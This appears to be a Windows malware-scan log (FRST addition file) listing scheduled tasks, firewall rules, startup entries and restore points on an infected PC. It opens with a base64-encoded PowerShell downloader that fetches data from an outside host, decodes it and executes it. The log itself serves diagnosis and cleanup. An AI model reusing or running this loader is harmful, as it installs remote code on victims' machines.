YQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AEEAQQBkADIAegBmAEgAdABJAFgASQBJADkAdgA0AFgAcQBJAGYAXwBUAE8ARABWAFYAQgBUAFQAOAAzAEsAaQBhAFIAMgAyAHIAYgB2AE8ASgBRAFYAawBrAEcAdwBVAGkAZQBBAGUAdwB5ADIAVABrAEoAdABNAHAAdABaAFoASwBGAGwAQgBFADIAeQBYAEUAeQAwAGIAeABOAC0ATQAxAEkAVABQAGEAQgBnAEoAYgBKAGIAeABiADgASgBoADYAUQBhAE8AVABhAGgANABSAHYAeABrAHgAdABRAG0AcQA0ADgASgBMADkAWQAtAEkAVQBMAGcAdABuAF8AYwBXAG8ARgBGAGwANgBfAHUASwBwAHMARABLADYAcwBkAHIAUgBwAFcAWABRADgAdgB3AFoAcABxAHMAYwBzAFQARQBaAFcATABOADkAVwA1AEMAdgA4ADEAQgA1AE0AOQBnAFgAWAA4AFQANAAxAFcAWABoAHMARwBhAHoANQBYAFYASgB5AGYAMgBpAHAAMwB0AHEAMwBtADcASwBUAHEAMwBKAEkARwAzADIAegBGAG4AdgBiAG8AYwBTAHgAOQBIAGkASwBtAGMAZgBYAEYAUAAyAGgATgBMAHgAdgBiAEUAcgB1AFYARQB2AHkANQBJAFUATABwAHUATAAzAGMAZwByAFIAbgBrADAAawBEAGIAcQBSAF8AVAB6AHYAWQA3AE8AXwBtAG8AUABtAEUANQBlAGUAawBUAFUAOQA4ADgAegBOAFEAXwA1AGQAWgA4AE8ATABqAFUATQBDADMAdABFAE0AdwBaAFkAVQB6AGwAUwBiAFkAYwAwAHgAQwBTAGgAZQBQAGoAVAB2AHQAWABxAFcATgBhAHYAagA1AGkANgBsAHcAUwBfAG8AegBMAFMAaABsAE8AaABtAEMAbABzAFAARgA1AGUAWgBnADMANgBtAEEATwB3AGYARgAwAG8AYwB1AFMAeABXAEIAegBZAEoAdgBEAFgAUgBWAG4AcgBFADgAMABnAHEAWABDAGkAdwA0AGcAYQB5AFQAVgBHAEUAZAB1AHcASgByAFEAYQBRAHAAbQBXAHoAUwBMAEEAXwBIAF8ATQBIAEsARABPAFYAawBhADkAVABEADgAMABsAG4AcwBMAEEARgBlAHkAZABVADQAeQA4AGsAUABqADMAQwBfADUAVwBKAEEANwA4AG0AJgBjAD0AUwBCAFQAZgBxAGwAMQAxAFIAVwB1AEkANgBlAHAAdABJAHQAcwBXAEUAbQBjAHQASQBMAFgARwBoAGIAcAB0ADMAawBpAGUAYQBZAGMAMwBKAEsAbwBBAEYAUwBSAE4ATABxAEkANwBPAFcAcwBTAGgAMgBiAGQARgA0AGEANABtAHUAaABSAFMANABDAGUALQBtAEgAQQBiADkAVQBEAF8ASwBwADUAaABTAEIAcwB0AFAAdQBRAEwAdgBsAHcATgBRADYAOQB5AHQAOAB1AGUAYgBwAGUAUAAzAHYASABnAGUAXwBlAHEAWgAzAEMAWgBwAC0AQwBTAFoAUAB6AFkAawBPAHUAMwB3AG4AdgBsAFUAcAAtAFAATgBtADIAOQBXAGIAegBEAEIAcQBVAEQAbABlAF8ANgA4AG4AOQBDADAASQA3ADkASwBZAEwANgB6AF8AZgBXADYAaABmAFYARAA4ADQAbwAzADgAZABFADMAVwB4AGsAdAA1AEQAQgBCAE8AUgBMADUAZgA3AHcAVABSAHIARQA1AGMANgBFADIARQBjAFoAbAA5AEkAdQBuADYARQBZAEUAOAAzADgAbwBwAFcAcQBoAE4AZgBuADEAVwBpAFoASAA1AEwAXwBMAHgAcgBCAGcAUAAzAEgANQBCAEkAYgB1ADEARQBwAGUAZQBJAGYAMQAzAEEANQAtAEsAcQBGAEcAZABFAFYAQgBUAEwAeABXAFQAMwB4AGMARwBPAEoASQAxAGgATwBpADAAWgBiAGwAYgBpAHIAWQBYADgATAA3AEIAUQBVAHkAdgBZAFQAcQBOAHgANQBnAFkAaABwAFEAbwBIADAAcABlAEkAUABKAHoATgBCAHEAZwBtAEEAOQBOAFIAVAB0AEYAcgBiAFAASgAzAEQAWgBWAEoAcQBWAGUAWgAwAE8AYQBHAFcAMgAyAFgAcQBDAGUAYwBWAFcAVgBDAGIALQBvAHMANwAzAGQARgBuAGsAbQBEAHkARgBnAFEAcABvAGMAYwByAEEASQBNAEEAVQBZAHIAUgBBAGoAdwByAEkAcgBkADgAUAA1AGIATAB2AFIANwBOAGgAVABQADAAQgAyAFkAYgBGAEIAQQA2ADUAWQBvAF8AMQBGAFkAdQBhADMARgBqAHQAbQBqAHIATABHADUAVwBxAFcAaAByAFMAYgBWAEwANQBfAFcAeQBhAHUAeABsADUAcgBUADEAcwBKAEYANAAwAEsAbABfAEsAawBBAGsAbABMADUAbgAwAEMAegA5AC0AdQBvAEsAWABNADIAUgB2AHYAMgBnAEMAUgA0AHUARABXAEQAZgBFAFoAYwBJAHAAaQBKAGUAcgBPAGgAXwBBAFoATwBwAHEAaQB6AHIAUgBaAEoAagBaAGsAUwBvAGwAOQBGADEAWABGAGsAUABmAG4AZwBDAHAAZQA0AF8AaQBNAHoAMwBPAHQATAA3AEIAMAB4ADEAZgBVADMAUgBmAFIAVgBGAFIAdABHAHkAagBCADUAbgBoADAAZwA2AGIANgBjAHgAagA0AGkAQgAtAG0AeABPAHAAWgBlADgAdgBpAGEANwBIAFEAMABRAGcARgBWAE4AYQAtADYAVgA0AEsAdgBpAEkAMgBqAEYASAAwAEQAZABxAEcAUgBBAGUATABmAGUATgBJAE4AcABsAFIAVQByAFQAZwBvAHIAdQBaAEcASgBCAGUALQB4AEIATwA1AGQAOQByADkAdgAzADAAdABWAEEAbABRAEIAZABxAFQALQA4AEUAJgByAD0AMQA5ADYAOQA2ADUANAAxADQAOQAwADMAOQAzADIAMAAxADUAMAAiADsAJABzAHQAcwBrAD0AIgB7ADYARAA5AEEARQA2AEMANAAtAEUAMAAxADkALQAwADEAOABDAC0AQwA5AEIANAAtADkARQAyADcAMQA0AEIANAA4AEUAMQAwAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {979D3DBD-25E6-45A0-94F9-9C65718D37D3} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe
Task: {9D3995D8-EDC8-49DE-A458-88F17D3EA586} - System32\Tasks\PornTime => C:\Program Files (x86)\PornTime\pt.exe
Task: {A564F7B1-A5A8-4A4D-A4BD-EDA62AD2FADE} - System32\Tasks\Norton Internet Security\Norton Error Processor => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\SymErr.exe
Task: {AB055F26-183D-4829-AE93-8E290BD1CBCA} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Internet Security\Engine\21.0.0.100\WSCStub.exe
Task: {B3E7FCC8-AD9C-44DD-952D-229AA7603D16} - System32\Tasks\GyazoUpdateTaskMachine => C:\Program Files (x86)\Gyazo\GyazoUpdate.exe [2015-08-19] ()
Task: {C52EA3BE-0342-4D28-B6C5-C7DE7FB77130} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {DBAA2EE1-0D9E-42A6-A5D1-2464AAE7B572} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.9.0.14\SymErr.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2014-05-20 19:33 - 2015-01-10 00:29 - 00117392 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-10-25 07:45 - 2012-10-25 07:45 - 00034304 _____ () C:\Windows\System32\sdo1ml6.dll
2014-07-16 10:06 - 2014-07-16 10:06 - 00672416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll
2014-05-20 19:28 - 2015-01-10 09:07 - 00011920 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2015-03-29 22:57 - 2015-12-25 20:47 - 50679920 _____ () C:\Users\Simon\AppData\Roaming\Spotify\libcef.dll
2015-03-29 22:57 - 2015-12-25 20:47 - 01882224 _____ () C:\Users\Simon\AppData\Roaming\Spotify\libglesv2.dll
2015-03-29 22:57 - 2015-12-25 20:47 - 00082544 _____ () C:\Users\Simon\AppData\Roaming\Spotify\libegl.dll
2015-12-25 23:21 - 2015-12-25 23:21 - 17647296 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup
MSCONFIG\startupreg: Andy => C:\Program Files\Andy\HandyAndy.exe
MSCONFIG\startupreg: Box Edit => C:\Users\Simon\AppData\Local\Box\Box Edit\Box Edit.exe
MSCONFIG\startupreg: Box Local Com Server => C:\ProgramData\Box\ComServer\Box Local Com Service.exe
MSCONFIG\startupreg: BrowserChoice => "C:\Windows\System32\browserchoice.exe" /run
MSCONFIG\startupreg: Gyazo => C:\Program Files (x86)\Gyazo\GyStation.exe
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: Skype => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
MSCONFIG\startupreg: Spotify => "C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe" /uri spotify:autostart
MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Simon\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"
MSCONFIG\startupreg: SteelSeries Engine => C:\Program Files\SteelSeries\SteelSeries Engine\SteelSeriesEngine.exe
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: Unified Remote v2 => C:\Users\Simon\Desktop\Ny mappe\RemoteServer.exe

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{AB2FEE24-8032-4E9E-92DA-64BB088FC41E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{F106D850-6184-4BD8-BEB3-45242004BC35}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{4E1B0C1D-5364-4F99-BD4A-ECCE74031C0A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{CB0C4F41-C187-4A1D-85F9-A69FF8D5CFEC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{13CAF80E-3321-4614-9CE3-74F2162BE597}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{31EDFDEA-FAEA-43B6-9F03-FE691930B95F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{A75C6E01-BECE-4F00-AA03-723A57B19147}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{98D1DBBE-BEA5-433E-9CA6-0B1714ACD936}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{B23CBBCF-50A7-478B-809F-83E2FDF83FD1}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{E4C6D351-DAD8-4220-BC6C-DE73EEA7C6DB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{270EABF0-B2D9-4597-B0A7-F75061F48CA0}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [TCP Query User{BC3E98B8-D846-4D9F-8D92-6A5BA3495D70}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{66E7805C-67FB-47F1-A39F-0C47A01EE572}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [{4792FD49-5934-42CF-AAD3-73DEA7C5F851}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{409438CE-1684-45DD-95EA-6864DB5687E7}] => (Allow) LPort=2869
FirewallRules: [{2A1A026D-FFE9-4073-9BA4-45010D1B2086}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{2C940A19-ACA9-41D0-B0E6-8F10E1832352}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{099A47F4-D1F0-4242-A024-AC85A7DA0C05}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{4046ED15-B5DC-44FE-AF82-CC6544125AB4}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{61F78399-B7D2-4F40-8272-FA2FE8A5D8A8}C:\users\simon\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\simon\appdata\roaming\spotify\spotify.exe
FirewallRules: [{7C2A5245-8A80-4ACE-82CF-10DE7EAC0228}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{F35C17EE-A6B7-4485-A687-C311E3392A94}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{98406585-EE39-4584-BD3F-F1BF414A0CC5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5554D9CC-7BD0-453A-AC47-BD705640C175}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{AD7C4BAF-9C55-4CE0-A596-801278A9614F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Team Fortress 2\hl2.exe
FirewallRules: [{A5B089B6-F6E2-4203-ABFD-A28E27B8B359}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6BEFAD78-3D5C-4F18-9538-5A4C7CC3E0E9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{0171AADA-49AA-4CDA-98B9-B7F5F5A75E44}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{FFE9D83D-7E4B-401D-84A3-5A947D59C412}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{086EA29B-9325-4BDB-B314-5EE46E605002}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{FF876EF3-52B9-4C91-9477-27F3E6247D4E}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{F2BBEFF5-FBA0-4432-B006-BE4E6540F707}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{68543947-F16B-448E-9BE6-88FB44857456}C:\program files\tixati\tixati.exe] => (Allow) C:\program files\tixati\tixati.exe
FirewallRules: [{65714679-8478-4C66-92EF-1A3A0C03545C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{98C0C0B1-31F6-41CF-9811-E3C54F0E8270}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{5EABEC4E-1B3F-493C-B50D-42F2D2BCB79C}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [{2825A6B2-A9EA-4B3D-81D2-6E7A4E146574}] => (Allow) C:\Program Files (x86)\Popcorn Time\Updater.exe
FirewallRules: [TCP Query User{0D481072-C761-4FB2-89F0-45AF6B6C9C3D}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [UDP Query User{6C5190FB-1903-4387-9DE6-9A16CB3879CE}C:\program files (x86)\java\jre7\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre7\bin\javaw.exe
FirewallRules: [TCP Query User{EA980882-35BE-47B4-A19B-2FD475CA6AB1}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [UDP Query User{1850CB56-D20F-4122-B53B-54A493C90733}C:\program files (x86)\popcorn time\chromecast\node.exe] => (Allow) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{E7C2471B-B7D0-48B6-95F1-9797E71B957E}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{ECB90B53-400F-4524-8D1B-261DDE021B0F}] => (Block) C:\program files (x86)\popcorn time\chromecast\node.exe
FirewallRules: [{1A445CA6-6818-4425-9939-793C713D4CD8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{11EF1017-59B8-44AA-8733-6441A42883A5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{FB3936F5-A285-43E9-8E89-73B271B60BFE}] => (Allow) LPort=5556
FirewallRules: [{CF260196-7A31-4F17-BD1A-4A124C939586}] => (Allow) LPort=5558
FirewallRules: [{42715D29-0E28-4043-949D-57D4E66AC21F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6D63373F-B12C-4589-8D9E-5EED49E92CBA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{FAF73EE2-2C47-421B-829B-2B7CA0BEABD9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{E463B906-D4E7-4F07-BDCD-45B6B4A8CBF1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [{07335363-4A29-4B87-B8BA-897571D157C3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\GarrysMod\hl2.exe
FirewallRules: [TCP Query User{58C9069B-3C00-44AD-924E-4366110F65CB}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [UDP Query User{FBB2681F-4FF7-4AC6-B5DD-7D541FFB0DF2}C:\program files\tixati\tixati.exe] => (Block) C:\program files\tixati\tixati.exe
FirewallRules: [{2E9338DD-C557-4FCD-8ABF-081E0E5CE611}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

03-01-2015 18:09:51 Windows Update
07-01-2015 11:48:05 Windows Update
11-01-2015 23:29:09 Installed Box Edit
17-01-2015 13:52:54 Windows Update
18-01-2015 01:52:06 Windows Update
22-01-2015 20:56:02 Windows Update
28-01-2015 23:19:10 Windows Update
09-02-2015 19:51:33 Windows Update
10-02-2015 15:08:07 Windows Defender Checkpoint
20-03-2015 07:36:02 Windows Update
13-04-2015 22:25:56 Installasjonsprogram for Windows-moduler
13-04-2015 22:28:58 Installasjonsprogram for Windows-moduler
13-04-2015 22:43:24 Windows Update
14-04-2015 01:59:55 Removed Bonjour
14-04-2015 02:00:17 Windows Update
14-04-2015 07:35:42 Installed DirectX
16-04-2015 17:05:09 Windows Defender Checkpoint
17-04-2015 06:28:06 Windows Update
21-04-2015 15:23:14 Windows Update
25-04-2015 01:10:40 Windows Update
28-04-2015 22:13:02 Windows Update
04-05-2015 13:57:55 Windows Update
05-05-2015 13:38:54 Windows Defender Checkpoint
16-05-2015 02:50:08 Windows Update
17-05-2015 00:35:34 Installed DirectX
17-05-2015 01:48:39 Windows Update
20-05-2015 22:17:42 Windows Update
26-05-2015 13:34:14 Windows Update
02-06-2015 10:22:40 Windows Update
05-06-2015 10:26:15 Windows Update
09-06-2015 06:44:26 Windows Update
10-06-2015 22:10:45 Windows Update
13-06-2015 23:49:57 Installed DirectX
16-06-2015 18:07:50 Windows Update
18-06-2015 02:30:18 Windows Defender Checkpoint
23-06-2015 17:49:41 Windows Update
28-06-2015 17:18:39 Windows Update
03-07-2015 11:52:32 Windows Update
07-07-2015 09:04:10 Windows Update
16-07-2015 12:42:09 Windows Update
26-07-2015 02:02:33 Installasjonsprogram for Windows-moduler
26-07-2015 23:37:24 Windows Update
27-07-2015 01:05:15 Windows Update
30-07-2015 03:27:55 Windows Update
30-07-2015 03:55:25 Windows Update
03-08-2015 19:26:35 Windows Update
11-08-2015 13:24:46 Windows Update
10-10-2015 01:42:20 Windows Update
10-10-2015 01:55:52 Windows Update
11-10-2015 02:53:39 Windows Update
27-10-2015 01:21:50 Installasjonsprogram for Windows-moduler
01-11-2015 02:14:41 Windows Update
01-11-2015 03:02:02 Windows Update
13-11-2015 19:14:13 Windows Update
17-11-2015 01:18:30 Windows Update
07-12-2015 03:25:33 Windows Update
07-12-2015 05:05:11 Windows Update
